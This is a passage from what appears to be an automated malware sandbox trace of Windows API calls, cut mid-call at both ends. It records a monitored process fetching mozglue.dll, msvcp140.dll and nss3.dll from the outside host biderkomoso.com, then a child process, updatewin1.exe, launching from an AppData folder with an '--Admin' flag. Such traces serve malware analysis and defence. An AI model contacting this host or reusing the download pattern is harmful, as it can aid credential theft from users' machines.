returned 1 [0093.488] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f5f90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f5f90*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.488] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f6378, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f6378*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.488] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f6760, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f6760*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.488] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f6b48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f6b48*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.488] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f6f30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f6f30*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.488] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f7318, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f7318*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.489] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f7700, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f7700*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.489] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f7ae8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f7ae8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.489] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f7ed0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f7ed0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.489] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f82b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f82b8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.489] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f86a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f86a0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.489] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f8a88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f8a88*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.489] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f8e70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f8e70*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.490] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f9258, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f9258*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.490] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f9640, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f9640*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.490] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f9a28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f9a28*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.490] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32f9e10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32f9e10*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.490] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fa1f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fa1f8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.490] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fa5e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fa5e0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.491] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fa9c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fa9c8*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.491] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fadb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fadb0*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.491] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fb198, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fb198*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.491] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fb580, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fb580*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.491] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x32fb968, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x32fb968*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.491] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x43800) returned 0x32fc050 [0093.491] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x32c0048 | out: hHeap=0x1dc0000) returned 1 [0093.491] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3337d58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3337d58*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.493] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3338140, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3338140*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.494] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3338528, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3338528*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.498] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3338910, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18eb84 | out: lpBuffer=0x3338910*, lpdwNumberOfBytesRead=0x18eb84*=0x3e8) returned 1 [0093.521] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0093.522] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18ed08, dwBufferLength=0x4) returned 1 [0093.522] InternetConnectA (hInternet=0xcc0004, lpszServerName="biderkomoso.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0093.522] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/mozglue.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0093.522] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x80) returned 0x1dc13d0 [0093.522] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0093.522] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0093.522] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0093.522] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0093.522] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc13d0 | out: hHeap=0x1dc0000) returned 1 [0093.522] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0093.564] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.573] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0093.573] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18ed08, dwBufferLength=0x4) returned 1 [0093.574] InternetConnectA (hInternet=0xcc0004, lpszServerName="biderkomoso.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0093.574] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/msvcp140.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0093.574] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x80) returned 0x1dc13d0 [0093.574] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0093.574] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0093.574] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0093.574] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0093.574] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc13d0 | out: hHeap=0x1dc0000) returned 1 [0093.574] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0096.209] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.137] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0098.137] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18ed08, dwBufferLength=0x4) returned 1 [0098.137] InternetConnectA (hInternet=0xcc0004, lpszServerName="biderkomoso.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0098.138] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/nss3.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0098.138] RtlAllocateHeap (HeapHandle=0x1dc0000, Flags=0x0, Size=0x80) returned 0x1dc13d0 [0098.138] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0098.138] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0098.138] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0098.138] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0098.138] HeapFree (in: hHeap=0x1dc0000, dwFlags=0x0, lpMem=0x1dc13d0 | out: hHeap=0x1dc0000) returned 1 [0098.138] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0098.234] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 Thread: id = 111 os_tid = 0xb24 Thread: id = 112 os_tid = 0xb34 Thread: id = 113 os_tid = 0xb44 Thread: id = 114 os_tid = 0xb54 Thread: id = 115 os_tid = 0xb64 Thread: id = 116 os_tid = 0xb74 Thread: id = 117 os_tid = 0xb84 Process: id = "10" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" page_root = "0x3158c000" os_pid = "0x9c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x8e4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" --Admin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 55 os_tid = 0x9d4 [0080.020] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x9edac360, dwHighDateTime=0x1d5d6b4)) [0080.020] GetCurrentProcessId () returned 0x9c4 [0080.021] GetCurrentThreadId () returned 0x9d4 [0080.021] GetTickCount () returned 0x115a3af [0080.021] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=22130480633) returned 1 [0080.031] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0080.031] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2f0000 [0080.035] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.035] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0080.036] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0080.036] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0080.036] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0080.036] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.036] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.037] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.037] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.037] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.037] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.038] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.038] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.039] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.039] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.040] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0080.040] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x214) returned 0x2f07d0 [0080.040] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.040] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0080.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e10000 [0080.041] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0080.041] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0080.042] GetCurrentThreadId () returned 0x9d4 [0080.042] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0080.042] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x800) returned 0x2f09f0 [0080.042] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0080.042] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0080.042] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0080.042] SetHandleCount (uNumber=0x20) returned 0x20 [0080.043] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe\" --Admin" [0080.043] GetEnvironmentStringsW () returned 0x4f4e78* [0080.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0080.043] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x565) returned 0x2f11f8 [0080.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2f11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0080.043] FreeEnvironmentStringsW (penv=0x4f4e78) returned 1 [0080.043] GetLastError () returned 0x0 [0080.044] SetLastError (dwErrCode=0x0) [0080.044] GetLastError () returned 0x0 [0080.044] SetLastError (dwErrCode=0x0) [0080.044] GetLastError () returned 0x0 [0080.044] SetLastError (dwErrCode=0x0) [0080.044] GetACP () returned 0x4e4 [0080.044] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x220) returned 0x2f1768 [0080.044] GetLastError () returned 0x0 [0080.044] SetLastError (dwErrCode=0x0) [0080.044] IsValidCodePage (CodePage=0x4e4) returned 1 [0080.044] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0080.044] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0080.045] GetLastError () returned 0x0 [0080.045] SetLastError (dwErrCode=0x0) [0080.045] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0080.045] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.045] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0080.045] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0080.045] GetLastError () returned 0x0 [0080.045] SetLastError (dwErrCode=0x0) [0080.045] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0080.045] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.045] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쁻먫㞕AĀ") returned 256 [0080.045] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쁻먫㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0080.046] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쁻먫㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0080.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" 